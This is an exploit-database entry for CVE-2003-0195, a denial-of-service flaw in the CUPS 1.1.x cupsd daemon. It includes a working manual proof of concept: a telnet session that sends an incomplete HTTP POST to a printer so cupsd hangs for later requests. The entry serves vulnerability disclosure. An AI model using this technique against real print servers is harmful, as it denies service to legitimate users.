CUPS 1.1.x Cupsd Request Method Denial of Service Vulnerability

2003-05-20T00:00:00
ID EDB-ID:22619
Type exploitdb
Reporter Phil D'Amore
Modified 2003-05-20T00:00:00

Description

CUPS 1.1.x Cupsd Request Method Denial Of Service Vulnerability. CVE-2003-0195. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/7637/info

The cupsd has been reported prone to a denial of service vulnerability.

Reportedly the cupsd does not adequately apply a time-out process for malicious HTTP requests and service is denied to subsequent cupsd requests.

This issue may be exploited by remote attackers to deny cupsd service to valid users.

$ telnet <your_favorite_cups_server> ipp
POST /printers/<your_favorite_printer> HTTP/1.1

Don't enter the second carriage return to complete the headers, just the POST line and one carriage return.